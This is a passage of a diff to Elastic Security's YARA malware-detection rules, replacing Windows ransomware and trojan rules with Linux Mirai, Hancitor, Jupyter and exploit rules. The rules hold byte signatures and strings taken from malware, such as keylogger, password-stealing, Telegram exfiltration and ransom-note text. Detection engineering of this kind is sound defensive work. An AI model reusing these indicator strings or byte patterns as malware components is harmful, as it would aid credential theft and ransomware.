01 02 8B 02 83 } condition: - 1 of ($d*) + all of them } -rule ELASTIC_Windows_Ransomware_Dharma_942142E3 : BETA FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_Cc93863B : FILE MEMORY { meta: - description = "Identifies DHARMA ransomware" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "942142e3-9197-41c4-86cc-66121c8a9ab5" - date = "2020-06-25" - modified = "2021-08-23" - reference = "https://blog.malwarebytes.com/threat-analysis/2019/05/threat-spotlight-crysis-aka-dharma-ransomware-causing-a-crisis-for-businesses/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Ransomware_Dharma.yar#L67-L86" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "af5068ef3442964e4d1c5e27090fb84eaf762ff23463b7a0c2902e523ae601c1" + id = "cc93863b-1050-40ba-9d02-5ec9ce6a3a28" + date = "2022-01-05" + modified = "2022-01-26" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L1802-L1820" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f" + logic_hash = "881998dee010270d7cefae5b59a888e541d4a2b93e3e52ae0abe0df41371c50d" score = 75 quality = 75 - tags = "BETA, FILE, MEMORY" - fingerprint = "e8ee60d53f92dd1ade8cc956c13a5de38f9be9050131ba727f2fab41dde619a8" - threat_name = "Windows.Ransomware.Dharma" + tags = "FILE, MEMORY" + fingerprint = "f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "C:\\crysis\\Release\\PDB\\payload.pdb" ascii fullword + $a = { C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08 } condition: - 1 of ($a*) + all of them } -rule ELASTIC_Windows_Trojan_Sourshark_F0247Cce : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_8Aa7B5D3 : FILE MEMORY { meta: - description = "Detects Windows Trojan Sourshark (Windows.Trojan.SourShark)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "f0247cce-b983-41a1-9118-fd4c23e3d099" - date = "2024-06-04" - modified = "2024-06-12" + id = "8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9" + date = "2022-01-05" + modified = "2022-01-26" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_SourShark.yar#L1-L21" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "07eb88c69437ee6e3ea2fbab5f2fbd8e846125d18c1da7d72bb462e9d083c9fc" - logic_hash = "0c5d802b5bfc771bdf5df541b18c7ab9de4f420fd3928bfd85b1a71cca2af1bc" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L1822-L1840" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f" + logic_hash = "3c99b7b126184b75802c7198c81f4783af776920edc6e964dbe726d28d88f64d" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "174d6683890b855a06c672423b4a0b3aa291558d8a2af4771b931d186ce3cb63" + fingerprint = "02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "%s\\svchost.%s" - $a2 = "crypto_domain" - $a3 = "postback_id" + $a = { 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88 } condition: all of them } -rule ELASTIC_Windows_Trojan_Sourshark_Adee8A17 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_76908C99 : FILE MEMORY { meta: - description = "Detects Windows Trojan Sourshark (Windows.Trojan.SourShark)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "adee8a17-cc0c-40b8-9ee6-a01b41e9befd" - date = "2024-06-04" - modified = "2024-06-12" + id = "76908c99-e350-4dbb-9559-27cbe05f55f9" + date = "2022-09-12" + modified = "2022-10-18" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_SourShark.yar#L23-L41" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "07eb88c69437ee6e3ea2fbab5f2fbd8e846125d18c1da7d72bb462e9d083c9fc" - logic_hash = "98a4d31849a1828c2154b5032a81580f5dcc8d4a65b96dea3a727e2a82a51666" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L1842-L1860" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "533a90959bfb337fd7532fb844501fd568f5f4a49998d5d479daf5dfbd01abb2" + logic_hash = "bd8254e888b1ea93ca9aad92ea2c8ece1f2d03ae2949ca4c3743b6e339ee21e0" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "f35ebe8a220693ef6288efae0d325c3f40e70836c088599cb9b620c59fab09da" + fingerprint = "1741b0c2121e3f73bf7e4f505c4661c95753cbf7e0b7a1106dc4ea4d4dd73d6c" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a = { 8B 45 08 8B 4C BE 08 8A 04 02 02 C3 02 C1 0F B6 D8 8B 44 9E 08 89 44 BE 08 8D 42 01 33 D2 89 4C 9E 08 47 83 F8 20 0F 4C D0 81 FF 00 01 00 00 7C CF 8B 16 33 FF 8B 5E 04 39 7D FC 7E 33 0F 1F 00 } + $a = { 64 24 F8 48 89 04 24 48 8B C6 48 8B 34 24 48 87 CF 48 8B 4C } condition: all of them } -rule ELASTIC_Windows_Trojan_Doubleback_D2246A35 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_1538Ce1A : FILE MEMORY { meta: - description = "Detects Windows Trojan Doubleback (Windows.Trojan.DoubleBack)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "d2246a35-e582-4707-acd0-f04bb66df722" - date = "2022-05-29" - modified = "2022-07-18" + id = "1538ce1a-7078-4be3-bd69-7e692a1237f5" + date = "2022-09-12" + modified = "2022-10-18" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_DoubleBack.yar#L1-L31" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "03d2a0747d06458ccddf65ff5847a511a105e0ad4dcb5134082623af6f705012" - logic_hash = "2241d2c6e5b5896fe6f3b02cb1786c39fa620ee503c4585bd75c8763b6d3c06a" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L1862-L1880" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "2382996a8fd44111376253da227120649a1a94b5c61739e87a4e8acc1130e662" + logic_hash = "cf2dd11da520640c6a64e05c4679072a714d8cf93d5f5aa3a1eca8eb3e9c8b3b" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "949f8d30125fad133f4b897c945c6aa0eccda5456dc887bde4c0a5affece5195" + fingerprint = "f3d82cae74db83b7a49c5ec04d1a95c3b17ab1b935de24ca5c34e9b99db36803" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $s1 = "client.dll" ascii fullword - $s2 = "=i.ext;" ascii fullword - $s3 = "## dbg delay" ascii fullword - $s4 = "ehost" - $s5 = "msie" - $s6 = "POST" - $s7 = "%s(%04Xh:%u/%u)[%s %s]: %s" ascii fullword - $x64_powershell_msi_check = { 81 3C 39 70 6F 77 65 74 ?? 81 3C 39 6D 73 69 65 41 } - $x86_powershell_msi_check = { 81 3C 30 70 6F 77 65 74 ?? 81 3C 30 6D 73 69 65 6A 03 5A 0F } - $x64_salted_hash_func = { 8B 7D ?? 4C 8D 45 ?? 81 C7 ?? ?? ?? ?? 48 8D 4D ?? BA 04 00 00 00 89 7D ?? } - $x86_salted_hash_func = { 8B 75 ?? 8D 45 ?? 50 6A ?? 81 C6 ?? ?? ?? ?? 8D 4D ?? 5A 89 75 ?? } - $x64_guid = { 48 83 EC ?? 45 33 C9 41 B8 DD CC BB AA 45 8D 51 ?? } - $x86_guid = { 55 8B EC 83 EC ?? B8 DD CC BB AA 56 57 6A ?? 8D 75 ?? 5F } + $a = { FD 00 00 00 FD 34 FD FD 04 40 FD 04 FD FD 7E 14 FD 78 14 1F 0F } condition: - 5 of ($s*) or 2 of ($x64_*) or 2 of ($x86_*) + all of them } -rule ELASTIC_Windows_Trojan_Hawkeye_77C36Ace : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_07B1F4F6 : FILE MEMORY { meta: - description = "Detects Windows Trojan Hawkeye (Windows.Trojan.Hawkeye)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "77c36ace-3857-43f8-a6de-596ba7964b6f" - date = "2021-08-16" - modified = "2021-10-04" + id = "07b1f4f6-9324-48ab-9086-b738fdaf47c3" + date = "2022-09-12" + modified = "2022-10-18" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Hawkeye.yar#L1-L23" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "28e28025060f1bafd4eb96c7477cab73497ca2144b52e664b254c616607d94cd" - logic_hash = "e8c1060efde0c4a073247d03a19dedb1c0acc8506fbf6eac93ac44f00fc73be1" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L1882-L1900" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "2382996a8fd44111376253da227120649a1a94b5c61739e87a4e8acc1130e662" + logic_hash = "4af1a20e29e0c9b62e1530031e49a3d7b37d4e9a547d89a270a2e59e0c7852cc" score = 75 - quality = 50 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "c9a1c61b4fa78c46d493e1b307e9950bd714ba4e5a6249f15a3b86a74b7638e5" + fingerprint = "bebafc3c8e68b36c04dc9af630b81f9d56939818d448759fdd83067e4c97e87a" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "Logger - Key Recorder - [" wide fullword - $a2 = "http://whatismyipaddress.com/" wide fullword - $a3 = "Keylogger Enabled: " wide fullword - $a4 = "LoadPasswordsSeaMonkey" wide fullword - $a5 = "\\.minecraft\\lastlogin" wide fullword + $a = { FD 08 FD 5C 24 48 66 FD 07 66 FD 44 24 2E 66 FD FD 08 66 FD 47 } condition: all of them } -rule ELASTIC_Windows_Trojan_Hawkeye_975D546C : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_Feaa98Ff : FILE MEMORY { meta: - description = "Detects Windows Trojan Hawkeye (Windows.Trojan.Hawkeye)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "975d546c-286b-4753-b894-d6ed0aa832f3" - date = "2023-03-23" - modified = "2023-04-23" + id = "feaa98ff-6cd9-40bb-8c4f-ea7c79b272f3" + date = "2022-09-12" + modified = "2022-10-18" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Hawkeye.yar#L25-L48" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "aca133bf1d72cf379101e6877871979d6e6e8bc4cc692a5ba815289735014340" - logic_hash = "cbd8ce991059f961236a4bb83ea5a78efa661199b40fca8b09550856e932198b" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L1902-L1920" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "2382996a8fd44111376253da227120649a1a94b5c61739e87a4e8acc1130e662" + logic_hash = "06be9d8bcfcb7e6b600103cf29fa8a94a457ff56e8c7018336c270978a57ccbf" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "5bbdb07fa6dd3e415f49d7f4fbc249c078ae42ebd81cad3015e32dfdc8f7cda6" + fingerprint = "0bc8ba390a11e205624bc8035b1d1e22337a5179a81d354178fa2546c61cdeb0" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $s1 = "api.telegram.org" - $s2 = "Browsers/Passwords" - $s3 = "Installed Browsers.txt" - $s4 = "Browsers/AutoFills" - $s5 = "Passwords.txt" - $s6 = "System Information.txt" + $a = { 0F FD FD FD FD FD FD 7A 03 41 74 5E 42 31 FD FD 6E FD FD FD FD } condition: all of them } -rule ELASTIC_Windows_Ransomware_Lockbit_89E64044 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_3Acd6Ed4 : FILE MEMORY { meta: - description = "Detects Windows Ransomware Lockbit (Windows.Ransomware.Lockbit)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "89e64044-74e4-4679-b6ad-bfb9b264330c" - date = "2021-08-06" - modified = "2021-10-04" + id = "3acd6ed4-6d62-47af-8d80-d5465abce38a" + date = "2022-09-12" + modified = "2022-10-18" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Ransomware_Lockbit.yar#L1-L21" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "0d6524b9a1d709ecd9f19f75fa78d94096e039b3d4592d13e8dbddf99867182d" - logic_hash = "bd504b078704b9f307a50c8556c143eee061015a9727670137aadc47ae93e2a6" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L1922-L1940" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "2644447de8befa1b4fe39b2117d49754718a2f230d6d5f977166386aa88e7b84" + logic_hash = "ab284d41af8e1920fa54ac8bfab84bac493adf816aebce60490ab22c0e502201" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "ec45013d3ecbc39ffce5ac18d5bf8b0d18bcadd66659975b0a9f26bcae0a5b49" + fingerprint = "e787989c37c26d4bb79c235150a08bbf3c4c963e2bc000f9a243a09bbf1f59cb" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "\\LockBit_Ransomware.hta" wide fullword - $a2 = "\\Registry\\Machine\\Software\\Classes\\Lockbit\\shell" wide fullword - $a3 = "%s\\%02X%02X%02X%02X.lock" wide fullword + $a = { E5 7E 44 4C 89 E3 31 FF 48 C1 E3 05 48 03 5D 38 48 89 2B 44 88 } condition: all of them } -rule ELASTIC_Windows_Ransomware_Lockbit_A1C60939 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_Eb940856 : FILE MEMORY { meta: - description = "Detects Windows Ransomware Lockbit (Windows.Ransomware.Lockbit)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "a1c60939-e257-420d-87ed-f31f30f2fc2a" - date = "2021-08-06" - modified = "2021-10-04" + id = "eb940856-60d2-4148-9126-aac79a24828e" + date = "2022-09-12" + modified = "2022-10-18" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Ransomware_Lockbit.yar#L23-L41" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "0d6524b9a1d709ecd9f19f75fa78d94096e039b3d4592d13e8dbddf99867182d" - logic_hash = "6e6d88251e93f69788ad22fc915133f3ba0267984d6a5004d5ca44dcd9f5f052" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L1942-L1960" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "fbf814c04234fc95b6a288b62fb9513d6bbad2e601b96db14bb65ab153e65fef" + logic_hash = "d7bb2373a35ea97a11513e80e9a561f53a8f0b9345f392e8e7f042d4cb2d7d20" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "a41fb21e82ee893468393428d655b03ce251d23f34acb54bbf01ae0eb86817bf" + fingerprint = "01532c6feda3487829ad005232d30fe7dde5e37fd7cecd2bb9586206554c90a7" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 3C 8B 4C 18 78 8D 04 19 89 45 F8 3B C3 74 70 33 C9 89 4D F4 39 } + $a = { 84 24 80 00 00 00 31 C9 EB 23 48 89 4C 24 38 48 8D 84 24 C8 00 } condition: all of them } -rule ELASTIC_Windows_Ransomware_Lockbit_369E1E94 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Hancitor_6738D84A : FILE MEMORY { meta: - description = "Detects Windows Ransomware Lockbit (Windows.Ransomware.Lockbit)" + description = "Detects Windows Trojan Hancitor (Windows.Trojan.Hancitor)" author = "Elastic Security" - id = "369e1e94-3fbb-4828-bb78-89d26e008105" - date = "2022-07-05" - modified = "2022-07-18" + id = "6738d84a-7393-4db2-97cc-66f471b5699a" + date = "2021-06-17" + modified = "2021-08-23" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Ransomware_Lockbit.yar#L43-L67" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "d61af007f6c792b8fb6c677143b7d0e2533394e28c50737588e40da475c040ee" - logic_hash = "c34dafc024d85902b85fc3424573abb8781d6fab58edd86c255266db3635ce98" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Hancitor.yar#L1-L21" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "a674898f39377e538f9ec54197689c6fa15f00f51aa0b5cc75c2bafd86384a40" + logic_hash = "448243b6925c4e419b1fd492ac5e8d43a7baa4492ba7a5a0b44bc8e036c77ec2" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "9cf4c112c0ee708ae64052926681e8351f1ccefeb558c41e875dbd9e4bdcb5f2" + fingerprint = "44a4dd7c35e0b4f3f161b82463d8f0ee113eaedbfabb7d914ce9486b6bd3a912" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -104615,3109 +104894,3205 @@ rule ELASTIC_Windows_Ransomware_Lockbit_369E1E94 : FILE MEMORY os = "windows" strings: - $a1 = { 66 83 F8 61 72 ?? 66 83 F8 66 77 ?? 66 83 E8 57 EB ?? 66 83 F8 30 72 ?? 66 83 F8 39 77 ?? 66 83 E8 30 EB ?? } - $a2 = { 8B EC 53 56 57 33 C0 8B 5D ?? 33 C9 33 D2 8B 75 ?? 8B 7D ?? 85 F6 74 ?? 55 8B 6D ?? 8A 54 0D ?? 02 D3 8A 5C 15 ?? 8A 54 1D ?? } - $a3 = { 53 51 6A ?? 58 0F A2 F7 C1 ?? ?? ?? ?? 0F 95 C0 84 C0 74 ?? 0F C7 F0 0F C7 F2 59 5B C3 6A ?? 58 33 C9 0F A2 F7 C3 ?? ?? ?? ?? 0F 95 C0 84 C0 74 ?? 0F C7 F8 0F C7 FA 59 5B C3 0F 31 8B C8 C1 C9 ?? 0F 31 8B D0 C1 C2 ?? 8B C1 59 5B C3 } - $b1 = { 6D 00 73 00 65 00 78 00 63 00 68 00 61 00 6E 00 67 00 65 00 00 00 73 00 6F 00 70 00 68 00 6F 00 73 00 } - $b2 = "LockBit 3.0 the world's fastest and most stable ransomware from 2019" ascii fullword - $b3 = "http://lockbit" - $b4 = "Warning! Do not delete or modify encrypted files, it will lead to problems with decryption of files!" ascii fullword + $a1 = "GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d" + $b1 = "Rundll32.exe %s, start" ascii fullword + $b2 = "MASSLoader.dll" ascii fullword condition: - 2 of ($a*) or all of ($b*) + $a1 or all of ($b*) } -rule ELASTIC_Windows_Generic_Threat_Bc6Ae28D : FILE MEMORY +rule ELASTIC_Windows_Trojan_Jupyter_56152E31 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Windows Trojan Jupyter (Windows.Trojan.Jupyter)" author = "Elastic Security" - id = "bc6ae28d-050b-43d9-ba57-82fb37a2bc91" - date = "2023-12-01" - modified = "2024-01-12" + id = "56152e31-77c6-49fa-bbc5-c3630f11e633" + date = "2021-07-22" + modified = "2021-08-23" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "ce00873eb423c0259c18157a07bf7fd9b07333e528a5b9d48be79194310c9d97" - logic_hash = "0ca5ec945858a5238eac048520dea4597f706ad2c96be322d341c84c4ddbce33" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Jupyter.yar#L1-L22" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "ce486097ad2491aba8b1c120f6d0aa23eaf59cf698b57d2113faab696d03c601" + logic_hash = "7b32e9caca744f4f6b48aefa5fda111e6b7ac81a62dd1fb8873d2c800ac3c42b" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "40a45e5b109a9b48cecd95899ff6350af5d28deb1c6f3aa4f0363ed3abf62bf7" - severity = 50 + fingerprint = "9cccc2e3d4cfe9ff090d02b143fa837f4da0c229426435b4e097f902e8c5fb01" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a = { 24 83 79 08 00 75 19 DD 01 8D 45 DC 50 51 51 DD 1C 24 E8 DB FC FF FF 85 C0 74 05 8B 45 F0 C9 C3 83 C8 FF C9 C3 55 8B EC 83 EC 24 83 79 08 00 75 19 DD 01 8D 45 DC 50 51 51 DD 1C } + $a1 = "%appdata%\\solarmarker.dat" ascii fullword + $a2 = "\\AppData\\Roaming\\solarmarker.dat" wide fullword + $b1 = "steal_passwords" ascii fullword + $b2 = "jupyter" ascii fullword condition: - all of them + 1 of ($a*) or 2 of ($b*) } -rule ELASTIC_Windows_Generic_Threat_Ce98C4Bc : FILE MEMORY +rule ELASTIC_Linux_Exploit_Courier_190258Dd : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Exploit Courier (Linux.Exploit.Courier)" author = "Elastic Security" - id = "ce98c4bc-22bb-4c2b-bced-8fc36bd3a2f0" - date = "2023-12-17" - modified = "2024-01-12" + id = "190258dd-1384-4144-aa05-7957ca0b464b" + date = "2021-04-06" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L21-L40" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "950e8a29f516ef3cf1a81501e97fbbbedb289ad9fb93352edb563f749378da35" - logic_hash = "74914f41c03cb2dcb1dc3175cc76574a0d40b66a1a3854af8f50c9858704b66b" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_Courier.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "349866d0fb81d07a35b53eac6f11176721629bbd692526851e483eaa83d690c3" + logic_hash = "c318d78a11a021334c84a21db2be6d7df57440a1f3ad6feaaff9cc95ebf6f716" score = 75 - quality = 71 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "d0849208c71c1845a6319052474549dba8514ecf7efe6185c1af22ad151bdce7" - severity = 50 + fingerprint = "4ba94b87847a76df80200d40383d2d289dc463faa609237dbc43f317db45074d" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 4D 65 73 73 61 67 65 50 61 63 6B 4C 69 62 2E 4D 65 73 73 61 67 65 50 61 63 6B } - $a2 = { 43 6C 69 65 6E 74 2E 41 6C 67 6F 72 69 74 68 6D } + $a = { E3 31 C0 50 54 53 50 B0 3B CD 80 31 C0 B0 01 CD } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_0Cc1481E : FILE MEMORY +rule ELASTIC_Multi_Hacktool_Nps_C6Eb4A27 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Multi Hacktool Nps (Multi.Hacktool.Nps)" author = "Elastic Security" - id = "0cc1481e-d666-4443-852c-679ef59e4ee4" - date = "2023-12-17" - modified = "2024-01-12" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L42-L60" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "6ec7781e472a6827c1406a53ed4699407659bd57c33dd4ab51cabfe8ece6f23f" - logic_hash = "1a094cf337cb85aa4b7d1d2025571ab0661a7be1fd03d53d8c7370a90385f38c" + id = "c6eb4a27-c481-41b4-914d-a27d10672d30" + date = "2024-01-24" + modified = "2024-01-29" + reference = "https://www.elastic.co/security-labs/unmasking-financial-services-intrusion-ref0657" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Multi_Hacktool_Nps.yar#L1-L25" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "4714e8ad9c625070ca0a151ffc98d87d8e5da7c8ef42037ca5f43baede6cfac1" + logic_hash = "53baf04f4ab8967761c6badb24f6632cc1bf4a448abf0049318b96855f30feea" score = 75 - quality = 75 + quality = 50 tags = "FILE, MEMORY" - fingerprint = "3dac71f8cbe7cb12066e91ffb6da6524891654fda249fa5934946fd5a2120360" - severity = 50 + fingerprint = "1386e4cef0f347b38a4614311d585b0b83cb9526b19215392aee893e594950de" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "multi" strings: - $a1 = { 83 C4 A8 53 56 57 8B FA 8B D8 8B 43 28 3B 78 10 0F 84 B4 00 00 00 8B F0 85 FF 75 15 83 7E 04 01 75 0F 8B 46 10 E8 03 A7 FF FF 33 C0 89 46 10 EB 7C 8B C3 E8 